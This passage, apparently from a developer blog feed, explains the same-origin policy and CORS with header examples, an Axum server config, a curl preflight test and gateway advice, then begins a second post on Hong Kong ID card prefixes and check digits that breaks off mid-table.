from another origin.”</p> </blockquote> <p>For example, JavaScript running on <code>https://app.example.com</code> cannot read the data or cookies from <code>https://api.example.com</code> unless the server explicitly allows it.</p> <p>Without SOP, any random site could load your webmail or banking page in the background and read sensitive data — a complete privacy disaster.</p> <p> </p> <h2> 3. What Is a Cross Origin Request? </h2> <p>Whenever your JavaScript tries to fetch a resource from a different origin (different scheme, host, or port), it becomes a <strong>cross-origin HTTP request</strong>.</p> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nf">fetch</span><span class="p">(</span><span class="dl">"</span><span class="s2">https://api.example.com/data</span><span class="dl">"</span><span class="p">);</span> </code></pre> </div> <p>If your page is served from <code>https://app.example.com</code>, this is a <strong>cross-origin</strong> call.</p> <p>When the server does not explicitly allow this, the browser blocks the response and logs:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Access to fetch at 'https://api.example.com/data' from origin 'https://app.example.com' has been blocked by CORS policy </code></pre> </div> <p>The browser enforces this for security — <u>not</u> because it <u>can’t send the request</u>, but because it <u>refuses to reveal the response</u> unless the server approves it.</p> <p> </p> <h2> 4. What Is CORS (Cross Origin Resource Sharing)? </h2> <p><strong>CORS</strong> is the official web standard that defines how a server can state:</p> <blockquote> <p>“These specific sites are allowed to access my resources.”</p> </blockquote> <p>CORS works through additional <strong>HTTP headers</strong> sent by the server to “grant permission” to specific origins.</p> <p>Example server response:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">Access-Control-Allow-Origin: https://app.example.com Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Allow-Headers: Content-Type </span></code></pre> </div> <p>When a browser sees this response, it verifies if the <code>Origin</code> header of the request matches the allowed origin(s).<br> If they match ✅ — the JavaScript call succeeds.<br> If not ❌ — the response is hidden from JavaScript.</p> <p> </p> <h2> 5. Simple CORS Requests </h2> <p>Some requests are so common and safe that browsers send them immediately — these are <strong>simple requests</strong>.</p> <p>To qualify as a <em>simple request</em>, all of the following conditions must hold:</p> <ul> <li>The HTTP method is <strong>GET</strong>, <strong>HEAD</strong>, or <strong>POST</strong>.</li> <li>The only manually set headers are “CORS-safelisted” (<code>Accept</code>, <code>Accept-Language</code>, <code>Content-Language</code>, <code>Content-Type</code> with restricted MIME types).</li> <li>The allowed <code>Content-Type</code> values are: <ul> <li><code>application/x-www-form-urlencoded</code></li> <li><code>multipart/form-data</code></li> <li><code>text/plain</code></li> </ul> </li> </ul> <h3> Example </h3> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nf">fetch</span><span class="p">(</span><span class="dl">"</span><span class="s2">https://api.example.com/data</span><span class="dl">"</span><span class="p">);</span> </code></pre> </div> <p>The browser automatically adds:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">Origin: https://app.example.com </span></code></pre> </div> <p>If the API responds with:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">Access-Control-Allow-Origin: https://app.example.com </span></code></pre> </div> <p>the response is shared successfully with JavaScript.</p> <p>If the header is missing or mismatched, the Fetch API rejects the promise with a CORS error, even though the network request technically went through.</p> <p> </p> <h2> 6. Preflight Requests </h2> <p>When a request might affect server data or uses <em>custom headers</em>, <em>non‑standard methods</em> (<code>DELETE</code>, <code>PUT</code>, <code>PATCH</code>, etc.), or a <code>Content-Type</code> like <code>application/json</code>, browsers perform an extra validation step called a <strong>Preflight Request</strong>.</p> <p>The following diagram illustrates the sequence of a <strong>CORS preflight request</strong> between the browser at <code>https://app.example.com</code> and the API server at <code>https://api.example.com</code>. It shows how the browser first sends an <code>OPTIONS</code> request to verify permissions before issuing the actual <code>POST</code> request.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7ib72tf1cky41wzuvvlg.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7ib72tf1cky41wzuvvlg.png" alt=" " width="800" height="478"></a></p> <h3> Step 1 — The OPTIONS Preflight &amp; The Server’s Response </h3> <p>Before sending the actual cross‑origin request, the browser checks with the target domain using an <code>OPTIONS</code> request:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="nf">OPTIONS</span> <span class="nn">/data</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="na">Host</span><span class="p">:</span> <span class="s">api.example.com</span> <span class="na">Origin</span><span class="p">:</span> <span class="s">https://app.example.com</span> <span class="na">Access-Control-Request-Method</span><span class="p">:</span> <span class="s">POST</span> <span class="na">Access-Control-Request-Headers</span><span class="p">:</span> <span class="s">X-CUSTOM-HEADER, Content-Type</span> </code></pre> </div> <p>If <code>https://api.example.com</code> approves the request, it responds with:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="m">200</span> <span class="ne">OK</span> <span class="na">Access-Control-Allow-Origin</span><span class="p">:</span> <span class="s">https://app.example.com</span> <span class="na">Access-Control-Allow-Methods</span><span class="p">:</span> <span class="s">POST</span> <span class="na">Access-Control-Allow-Headers</span><span class="p">:</span> <span class="s">X-CUSTOM-HEADER, Content-Type</span> <span class="na">Access-Control-Allow-Credentials</span><span class="p">:</span> <span class="s">true</span> <span class="na">Access-Control-Max-Age</span><span class="p">:</span> <span class="s">86400</span> </code></pre> </div> <p>This response indicates:</p> <ul> <li>The origin <code>https://app.example.com</code> is allowed to access the resource.</li> <li>The <code>POST</code> method and specified headers are permitted.</li> <li>Credentials are allowed to be sent (e.g., cookies or tokens).</li> <li>The browser may cache this permission for 24 hours.</li> </ul> <h3> Step 2 — The Actual Request </h3> <p>Once validated, the browser proceeds with the intended request:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="nf">POST</span> <span class="nn">/data</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="na">Host</span><span class="p">:</span> <span class="s">api.example.com</span> <span class="na">Origin</span><span class="p">:</span> <span class="s">https://app.example.com</span> <span class="na">Content-Type</span><span class="p">:</span> <span class="s">application/json</span> <span class="na">X-CUSTOM-HEADER</span><span class="p">:</span> <span class="s">123</span> </code></pre> </div> <p>If the response includes a valid <code>Access-Control-Allow-Origin</code> header that matches the origin, the browser allows the web application at <code>https://app.example.com</code> to read the data returned from <code>https://api.example.com</code>.</p> <p> </p> <h2> 7. Key CORS Headers Explained </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Header</th> <th>Purpose</th> </tr> </thead> <tbody> <tr> <td><strong>Access-Control-Allow-Origin</strong></td> <td>Specifies which origin(s) are allowed. Use <code>*</code> for any, or a specific domain like <code>https://app.example.com</code>.</td> </tr> <tr> <td><strong>Access-Control-Allow-Methods</strong></td> <td>Declares which HTTP methods can be used.</td> </tr> <tr> <td><strong>Access-Control-Allow-Headers</strong></td> <td>Lists the allowed non-simple headers the client can send.</td> </tr> <tr> <td><strong>Access-Control-Max-Age</strong></td> <td>How long browsers can cache the preflight result (in seconds).</td> </tr> <tr> <td><strong>Access-Control-Expose-Headers</strong></td> <td>Allows JavaScript to read additional response headers beyond the default six (<code>Cache-Control</code>, <code>Content-Language</code>, <code>Content-Type</code>, <code>Expires</code>, <code>Last-Modified</code>, <code>Pragma</code>).</td> </tr> <tr> <td><strong>Access-Control-Allow-Credentials</strong></td> <td>Indicates whether the server allows credentials (cookies, Authorization headers) for cross-origin requests.</td> </tr> </tbody> </table></div> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">Access-Control-Allow-Origin: https://app.example.com Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization Access-Control-Allow-Credentials: true Access-Control-Expose-Headers: X-My-Custom-Header </span></code></pre> </div> <p> </p> <h2> 8. CORS with Cookies and Credentials </h2> <p>By default, cross-origin requests <strong>do not</strong> include cookies or credentials due to security risks.</p> <p>To enable them:</p> <h3> Client‑side </h3> <p>For <strong>Fetch API</strong>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nf">fetch</span><span class="p">(</span><span class="dl">"</span><span class="s2">https://api.example.com/data</span><span class="dl">"</span><span class="p">,</span> <span class="p">{</span> <span class="na">credentials</span><span class="p">:</span> <span class="dl">"</span><span class="s2">include</span><span class="dl">"</span> <span class="p">});</span> </code></pre> </div> <p>For <strong>XMLHttpRequest</strong>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">xhr</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">XMLHttpRequest</span><span class="p">();</span> <span class="nx">xhr</span><span class="p">.</span><span class="nx">withCredentials</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span> <span class="nx">xhr</span><span class="p">.</span><span class="nf">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">POST</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">https://api.example.com/data</span><span class="dl">"</span><span class="p">);</span> <span class="nx">xhr</span><span class="p">.</span><span class="nf">send</span><span class="p">();</span> </code></pre> </div> <h3> Server‑side </h3> <p>The response must include:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://app.example.com </span></code></pre> </div> <blockquote> <p>⚠️ Important:<br> When <code>Access-Control-Allow-Credentials: true</code> is used,<br> <code>Access-Control-Allow-Origin</code> <strong>cannot be <code>*</code></strong> — it must name the specific origin.</p> </blockquote> <p>Otherwise, the browser will reject the response, showing:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>The value of 'Access-Control-Allow-Origin' must not be '*' when the request’s credentials mode is 'include'. </code></pre> </div> <p>This combination ensures sensitive authenticated requests are only allowed from known, trusted sites.</p> <p> </p> <h2> 9. Practical Example: CORS in Rust (Axum) </h2> <p>Here’s how to configure <strong>multi-subdomain CORS support</strong> in your backend using the Rust web framework <strong>Axum</strong>.</p> <h3> Cargo.toml </h3> <div class="highlight js-code-highlight"> <pre class="highlight toml"><code><span class="nn">[dependencies]</span> <span class="py">axum</span> <span class="p">=</span> <span class="s">"0.8.6"</span> <span class="py">serde_json</span> <span class="p">=</span> <span class="s">"1.0.145"</span> <span class="py">tokio</span> <span class="o">=</span> <span class="p">{</span> <span class="py">version</span> <span class="p">=</span> <span class="s">"1.48.0"</span><span class="p">,</span> <span class="py">features</span> <span class="p">=</span> <span class="p">[</span><span class="s">"full"</span><span class="p">]</span> <span class="p">}</span> <span class="py">tower-http</span> <span class="o">=</span> <span class="p">{</span> <span class="py">version</span> <span class="p">=</span> <span class="s">"0.6.6"</span><span class="p">,</span> <span class="py">features</span> <span class="p">=</span> <span class="p">[</span><span class="s">"cors"</span><span class="p">]</span> <span class="p">}</span> </code></pre> </div> <h3> Main Application </h3> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">use</span> <span class="nn">axum</span><span class="p">::{</span> <span class="n">Json</span><span class="p">,</span> <span class="n">Router</span><span class="p">,</span> <span class="n">http</span><span class="p">,</span> <span class="nn">http</span><span class="p">::{</span><span class="n">HeaderValue</span><span class="p">,</span> <span class="n">Method</span><span class="p">,</span> <span class="n">StatusCode</span><span class="p">},</span> <span class="nn">response</span><span class="p">::</span><span class="n">IntoResponse</span><span class="p">,</span> <span class="nn">routing</span><span class="p">::</span><span class="n">get</span><span class="p">,</span> <span class="p">};</span> <span class="k">use</span> <span class="nn">serde_json</span><span class="p">::</span><span class="n">json</span><span class="p">;</span> <span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">net</span><span class="p">::</span><span class="n">SocketAddr</span><span class="p">;</span> <span class="k">use</span> <span class="nn">tower_http</span><span class="p">::</span><span class="nn">cors</span><span class="p">::</span><span class="n">CorsLayer</span><span class="p">;</span> <span class="nd">#[tokio::main]</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="k">let</span> <span class="n">allowed_origins</span> <span class="o">=</span> <span class="nd">vec!</span><span class="p">[</span> <span class="s">"https://app.example.com"</span><span class="p">,</span> <span class="s">"https://api.example.com"</span><span class="p">,</span> <span class="s">"https://fs.example.com"</span><span class="p">,</span> <span class="p">];</span> <span class="k">let</span> <span class="n">cors</span> <span class="o">=</span> <span class="nn">CorsLayer</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span> <span class="nf">.allow_origin</span><span class="p">(</span> <span class="n">allowed_origins</span> <span class="nf">.into_iter</span><span class="p">()</span> <span class="nf">.filter_map</span><span class="p">(|</span><span class="n">o</span><span class="p">|</span> <span class="n">o</span><span class="py">.parse</span><span class="p">::</span><span class="o">&lt;</span><span class="n">HeaderValue</span><span class="o">&gt;</span><span class="p">()</span><span class="nf">.ok</span><span class="p">())</span> <span class="py">.collect</span><span class="p">::</span><span class="o">&lt;</span><span class="nb">Vec</span><span class="o">&lt;</span><span class="n">_</span><span class="o">&gt;&gt;</span><span class="p">(),</span> <span class="p">)</span> <span class="nf">.allow_methods</span><span class="p">([</span><span class="nn">Method</span><span class="p">::</span><span class="n">GET</span><span class="p">,</span> <span class="nn">Method</span><span class="p">::</span><span class="n">POST</span><span class="p">,</span> <span class="nn">Method</span><span class="p">::</span><span class="n">DELETE</span><span class="p">,</span> <span class="nn">Method</span><span class="p">::</span><span class="n">OPTIONS</span><span class="p">])</span> <span class="nf">.allow_headers</span><span class="p">([</span><span class="nn">http</span><span class="p">::</span><span class="nn">header</span><span class="p">::</span><span class="n">CONTENT_TYPE</span><span class="p">,</span> <span class="nn">http</span><span class="p">::</span><span class="nn">header</span><span class="p">::</span><span class="n">AUTHORIZATION</span><span class="p">])</span> <span class="nf">.allow_credentials</span><span class="p">(</span><span class="k">true</span><span class="p">);</span> <span class="k">let</span> <span class="n">app</span> <span class="o">=</span> <span class="nn">Router</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span> <span class="nf">.route</span><span class="p">(</span><span class="s">"/api/data"</span><span class="p">,</span> <span class="nf">get</span><span class="p">(</span><span class="n">get_data</span><span class="p">)</span><span class="nf">.post</span><span class="p">(</span><span class="n">post_data</span><span class="p">))</span> <span class="nf">.layer</span><span class="p">(</span><span class="n">cors</span><span class="p">);</span> <span class="k">let</span> <span class="n">addr</span> <span class="o">=</span> <span class="nn">SocketAddr</span><span class="p">::</span><span class="nf">from</span><span class="p">(([</span><span class="mi">127</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">],</span> <span class="mi">8080</span><span class="p">));</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Server running at http://{addr}"</span><span class="p">);</span> <span class="nn">axum</span><span class="p">::</span><span class="nf">serve</span><span class="p">(</span><span class="nn">tokio</span><span class="p">::</span><span class="nn">net</span><span class="p">::</span><span class="nn">TcpListener</span><span class="p">::</span><span class="nf">bind</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span><span class="k">.await</span><span class="nf">.unwrap</span><span class="p">(),</span> <span class="n">app</span><span class="p">)</span> <span class="k">.await</span> <span class="nf">.unwrap</span><span class="p">();</span> <span class="p">}</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">get_data</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="k">impl</span> <span class="n">IntoResponse</span> <span class="p">{</span> <span class="p">(</span><span class="nn">StatusCode</span><span class="p">::</span><span class="n">OK</span><span class="p">,</span> <span class="nf">Json</span><span class="p">(</span><span class="nd">json!</span><span class="p">({</span> <span class="s">"message"</span><span class="p">:</span> <span class="s">"GET OK"</span> <span class="p">})))</span> <span class="p">}</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">post_data</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="k">impl</span> <span class="n">IntoResponse</span> <span class="p">{</span> <span class="p">(</span><span class="nn">StatusCode</span><span class="p">::</span><span class="n">OK</span><span class="p">,</span> <span class="nf">Json</span><span class="p">(</span><span class="nd">json!</span><span class="p">({</span> <span class="s">"message"</span><span class="p">:</span> <span class="s">"POST OK"</span> <span class="p">})))</span> <span class="p">}</span> </code></pre> </div> <h3> Explanation </h3> <ul> <li>Allows specific subdomains (<code>app</code>, <code>api</code>, <code>fs</code>) to share resources.</li> <li>Enables all major methods and headers.</li> <li>Credentials (cookies/tokens) are explicitly allowed.</li> <li>Other unlisted origins are blocked at the browser level.</li> </ul> <p> </p> <h2> 10. API Gateway and Backend: Where Should You Configure CORS? </h2> <p>When your backend is served behind an <strong>API Gateway</strong> — such as AWS API Gateway, NGINX, Kong, or Traefik — it can be confusing where to configure <strong>CORS (Cross-Origin Resource Sharing)</strong>.</p> <p>Let’s go through when and <strong>where</strong> to apply CORS: Gateway, Backend, or both.</p> <p> </p> <h3> First Principle </h3> <p>CORS is <strong>enforced by browsers</strong>, not servers.</p> <blockquote> <p>The only thing that matters is that the <strong>final HTTP response reaching the browser</strong> includes valid CORS headers.</p> </blockquote> <p>That means it doesn’t matter who adds them — as long as the browser sees the correct headers.</p> <p> </p> <h3> Option 1 — Handle CORS at the API Gateway (<strong>Recommended</strong>) </h3> <p>The <strong>API Gateway</strong> is the first server a browser talks to.<br> That makes it the perfect place for centralized CORS handling.</p> <h4> Advantages </h4> <ol> <li><p><strong>Centralized Policy Management</strong><br> Manage all origins, headers, and methods in one place.</p></li> <li><p><strong>Simplified Backends</strong><br> Microservices don’t have to duplicate CORS logic.</p></li> <li><p><strong>Automatic Preflight Handling</strong><br> The Gateway can respond to <code>OPTIONS</code> requests itself.</p></li> <li><p><strong>Faster Updates</strong><br> Adjust CORS rules without rebuilding backend code.</p></li> </ol> <h4> Example — AWS API Gateway CORS Config </h4> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"CorsConfiguration"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"AllowOrigins"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"https://app.example.com"</span><span class="p">],</span><span class="w"> </span><span class="nl">"AllowMethods"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"GET"</span><span class="p">,</span><span class="w"> </span><span class="s2">"POST"</span><span class="p">,</span><span class="w"> </span><span class="s2">"OPTIONS"</span><span class="p">],</span><span class="w"> </span><span class="nl">"AllowHeaders"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"Content-Type"</span><span class="p">,</span><span class="w"> </span><span class="s2">"Authorization"</span><span class="p">],</span><span class="w"> </span><span class="nl">"AllowCredentials"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>The Gateway:</p> <ul> <li>Responds automatically to <code>OPTIONS</code> preflight.</li> <li>Injects the proper headers into responses.</li> <li>Hides the complexity from your backend APIs.</li> </ul> <p> </p> <h3> Option 2 — Handle CORS in the Backend (When Needed) </h3> <p>You might choose backend-level CORS if:</p> <ul> <li>Your Gateway acts as a <strong>transparent proxy</strong> (no header manipulation).</li> <li>Different services require <strong>different</strong> origins or rules.</li> <li>Certain API calls skip the Gateway entirely.</li> </ul> <p>You must handle:</p> <ul> <li> <code>OPTIONS</code> preflight responses.</li> <li>Matching origins exactly between request and header.</li> <li>No wildcard <code>*</code> when <code>Access-Control-Allow-Credentials: true</code> is used.</li> </ul> <p> </p> <h3> Option 3 — Handle CORS in Both (Not Rcommanded) </h3> <p>In some environments, both Gateway and Backend add CORS headers — typically during a migration.</p> <p><strong>This is fine</strong> <em>only if</em> both configurations return identical headers.<br> Otherwise, conflicting values (for example, <code>Access-Control-Allow-Origin</code>) cause browsers to discard the response.</p> <p>Use this dual setup only temporarily, not as a permanent architecture.</p> <p> </p> <h3> When You Don’t Need CORS </h3> <p>CORS is purely a browser security mechanism.</p> <p>If requests originate from:</p> <ul> <li>Another backend server</li> <li>Mobile apps using native HTTP clients</li> <li>Internal service networks (no browsers)</li> </ul> <p>Then you don’t need CORS at all.</p> <p> </p> <h3> Best Practice Decision Table </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Scenario</th> <th>Who Should Handle CORS?</th> <th>Why</th> </tr> </thead> <tbody> <tr> <td>Browser calls API through public gateway</td> <td>Gateway</td> <td>Centralized and simpler</td> </tr> <tr> <td>Gateway is transparent or not configurable</td> <td>Backend</td> <td>Backend must manage headers</td> </tr> <tr> <td>Gradual migration</td> <td>Both</td> <td>Temporary safety</td> </tr> <tr> <td>Internal or mobile-only access</td> <td>None</td> <td>Not needed</td> </tr> </tbody> </table></div> <ul> <li>CORS belongs at the <strong>first browser-facing layer</strong>, ideally the API Gateway.</li> <li>The Backend should only handle CORS if the Gateway can’t or shouldn’t.</li> <li>Having both handle it can create conflicts unless headers match exactly.</li> <li>For consistent behavior, centralize CORS logic at the Gateway.</li> </ul> <p> </p> <h3> Testing Your Setup </h3> <p>Use <code>curl</code> or a REST client to simulate preflight requests:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-i</span> <span class="nt">-X</span> OPTIONS <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Origin: https://app.example.com"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Access-Control-Request-Method: POST"</span> <span class="se">\</span> https://api.example.com/data </code></pre> </div> <p>If your configuration is correct, you should see:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>HTTP/1.1 200 OK Access-Control-Allow-Origin: https://app.example.com Access-Control-Allow-Methods: POST, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization Access-Control-Allow-Credentials: true </code></pre> </div> <p>That means your Gateway or Backend CORS rules are properly aligned.</p> <blockquote> <p><strong>If browsers connect to your API via the Gateway, configure CORS on the Gateway.</strong><br> <strong>Use backend CORS only when the Gateway can’t handle it.</strong></p> </blockquote> <p> </p> <h2> 11. Loading Resources Cross Domain with the Script Tag </h2> <p>Under the <strong>Same‑Origin Policy (SOP)</strong>, web pages are generally restricted from reading data returned by requests to other domains. However, some HTML elements — such as <code>&lt;script&gt;</code>, <code>&lt;img&gt;</code>, and <code>&lt;link&gt;</code> — are not limited by this rule.</p> <p>The <code>&lt;script&gt;</code> element was intentionally designed to allow loading and executing code from different origins. This design supports the reuse of external resources, such as shared libraries, analytics scripts, or frameworks hosted on content delivery networks (CDNs). The restriction under SOP applies mainly to reading data, not to loading and executing external code.</p> <p>When a browser processes a tag like the following:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;script </span><span class="na">src=</span><span class="s">"https://cdn.example.com/library.js"</span><span class="nt">&gt;&lt;/script&gt;</span> </code></pre> </div> <p>it sends an HTTP request to the external domain, retrieves the JavaScript file, and executes it in the context of the current page. The browser does not block this behavior because the script is not trying to read external data; it simply imports executable code that runs locally once loaded.</p> <p>This capability forms the foundation of how websites include shared scripts, but it also introduces potential security risks. If a malicious or compromised external script is loaded, it gains full access to the page’s environment, including the Document Object Model (DOM), cookies (when accessible), and user interactions. For this reason, modern security practices recommend:</p> <ul> <li>Hosting critical scripts within the same origin when possible.</li> <li>Using <strong>Subresource Integrity (SRI)</strong> to ensure the script’s content matches an expected hash.</li> <li>Limiting external dependencies to trusted sources.</li> </ul> <p>In modern browsers, this cross‑domain script inclusion remains allowed but is managed through stricter security mechanisms such as <strong>Content Security Policy (CSP)</strong> and <strong>SRI</strong>, which help reduce risks associated with externally loaded scripts.</p> <p> </p> <h2> 12. A Short History of CORS </h2> <p>Web browsers originally enforced the <strong>Same‑Origin Policy (SOP)</strong>, which restricted web pages from making requests to different domains. To work around this limitation, developers used a method known as <strong>JSONP (JSON with Padding)</strong>. JSONP allowed limited cross‑domain data exchange through <code>&lt;script&gt;</code> tags but was constrained to <code>GET</code> requests and presented security concerns.</p> <p>The <strong>World Wide Web Consortium (W3C)</strong> initiated work on a standardized solution in <strong>May 2006</strong>, when the first <strong>W3C Working Draft</strong> was published. In <strong>March 2009</strong>, the draft was renamed to <strong>Cross‑Origin Resource Sharing (CORS)</strong>, and in <strong>January 2014</strong>, it became an official <strong>W3C Recommendation</strong>.</p> <p>CORS introduced a standardized set of HTTP headers that enable controlled access to resources across different origins, defining how browsers and servers can interact securely across domains.</p> <p> </p> <h2> 13. Summary </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Scenario</th> <th>Required Headers</th> <th>Notes</th> </tr> </thead> <tbody> <tr> <td><strong>Simple Request</strong></td> <td><code>Access-Control-Allow-Origin</code></td> <td>GET/POST/HEAD only</td> </tr> <tr> <td><strong>Non‑Simple (Preflighted)</strong></td> <td> <code>Access-Control-Allow-Origin</code>, <code>Access-Control-Allow-Methods</code>, <code>Access-Control-Allow-Headers</code> </td> <td>Browser sends an <code>OPTIONS</code> request first</td> </tr> <tr> <td><strong>Using Cookies</strong></td> <td>Same as above + <code>Access-Control-Allow-Credentials: true</code> </td> <td> <code>Access-Control-Allow-Origin</code> must <strong>not</strong> use <code>*</code> </td> </tr> <tr> <td><strong>Expose Extra Headers</strong></td> <td>Add <code>Access-Control-Expose-Headers</code> </td> <td>Allows JS to read non‑default headers</td> </tr> </tbody> </table></div> <p><strong>Troubleshooting Flow:</strong></p> <ol> <li>Check whether your request is “simple” or requires preflight.</li> <li>Ensure your backend handles the <code>OPTIONS</code> call correctly.</li> <li>Validate <code>Access-Control-Allow-Origin</code> matches exactly.</li> <li>When using cookies, ensure both client and server specify credentials explicitly.</li> </ol> <p> </p> <h2> 14. References </h2> <ul> <li><a href="https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy" rel="noopener noreferrer">MDN: Same-origin policy</a></li> <li><a href="https://www.w3.org/Security/wiki/Same_Origin_Policy" rel="noopener noreferrer">W3C: Same Origin Policy - Web Security</a></li> <li><a href="https://en.wikipedia.org/wiki/Same-origin_policy" rel="noopener noreferrer">Wikipedia: Same-origin policy</a></li> <li><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CORS" rel="noopener noreferrer">MDN: Cross-Origin Resource Sharing (CORS)</a></li> <li><a href="https://en.wikipedia.org/wiki/Cross-origin_resource_sharing" rel="noopener noreferrer">Wikipedia: Cross-origin resource sharing</a></li> <li><a href="https://javascript.info/fetch-crossorigin" rel="noopener noreferrer">Fetch: Cross-Origin Requests</a></li> </ul> web security sop cors Sam Leung Sat, 17 May 2025 18:15:22 +0000 https://dev.to/samleung/understanding-the-hong-kong-identity-card-hkid-symbols-prefixes-and-check-digit-calculation-21la https://dev.to/samleung/understanding-the-hong-kong-identity-card-hkid-symbols-prefixes-and-check-digit-calculation-21la <p> </p> <blockquote> <p>🔥🔥🔥This blog post is periodically updated to ensure the information remains current.</p> </blockquote> <p> </p> <h2> Why I Wrote This? </h2> <p> <br> I am currently handling a project that needs to check whether a user-entered HKID is correct or not, and also to generate HKID numbers for testing purposes. To achieve this, I needed to learn and clarify the HKID rules in detail, from the structure and meaning of its symbols and prefixes, to the logic behind its check digit calculation.</p> <p> <br> This blog post documents what I’ve learned, how the check digit system works, and how you can validate or generate HKIDs in your own projects.</p> <p><strong>IMPORTANT</strong>❗❗❗<br> The HKID check digit algorithm here is based on commonly shared internet sources, not official documentation, so results may not be 100% accurate.</p> <p> <br> <strong>IMPORTANT</strong>❗❗❗<br> All the sample code will be written in <code>Rust</code>, so some basic familiarity with Rust (such as functions, variables, and basic control flow) will help you follow along.</p> <p> <br> <strong>IMPORTANT</strong>❗❗❗<br> For simplicity, I’ll use <code>[</code> to represent a <code>space</code> character in HKID examples and logic throughout this post.</p> <h2> 1. HKID Symbols and Prefixes: What Do They Mean? </h2> <p> </p> <h3> 1.1 HKID Number Format Explained </h3> <p> <br> An HKID number typically looks like this: <code>X123456(A)</code>, where:</p> <ul> <li> <code>X</code> is one or two letters (the <strong>prefix</strong>)</li> <li> <code>123456</code> is a six-digit serial number (each digit is 0–9)</li> <li> <code>A</code> is the <strong>check digit</strong> (in brackets)</li> </ul> <p> </p> <h3> 1.2 Prefix Meanings </h3> <p> <br> The prefix letters indicate the period or category of issuance. Here is a comprehensive list:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Prefix</th> <th>Explanation / Issuance</th> </tr> </thead> <tbody> <tr> <td><strong>A</strong></td> <td>Original ID cards, issued between 1949 and 1962, most holders were born before 1950</td> </tr> <tr> <td><strong>B</strong></td> <td>Issued between 1955 and 1960 in city offices</td> </tr> <tr> <td><strong>C</strong></td> <td>Issued between 1960 and 1983 in NT offices, if a child most born between 1946 and 1971, principally HK born</td> </tr> <tr> <td><strong>D</strong></td> <td>Issued between 1960 and 1983 at HK Island office, if a child most born between, principally HK born</td> </tr> <tr> <td><strong>E</strong></td> <td>Issued between 1955 and 1969 in Kowloon offices, if a child most born between 1946 and 1962, principally HK born</td> </tr> <tr> <td><strong>F</strong></td> <td>First issue of a card commencing from 24 February 2020</td> </tr> <tr> <td><strong>G</strong></td> <td>Issued between 1967 and 1983 in Kowloon offices, if a child most born between 1956 and 1971</td> </tr> <tr> <td><strong>H</strong></td> <td>Issued between 1979 and 1983 in HK Island offices, if a child most born between 1968 and 1971, principally HK born</td> </tr> <tr> <td><strong>J</strong></td> <td>Consular officers</td> </tr> <tr> <td><strong>K</strong></td> <td>First issue of an ID card between 28 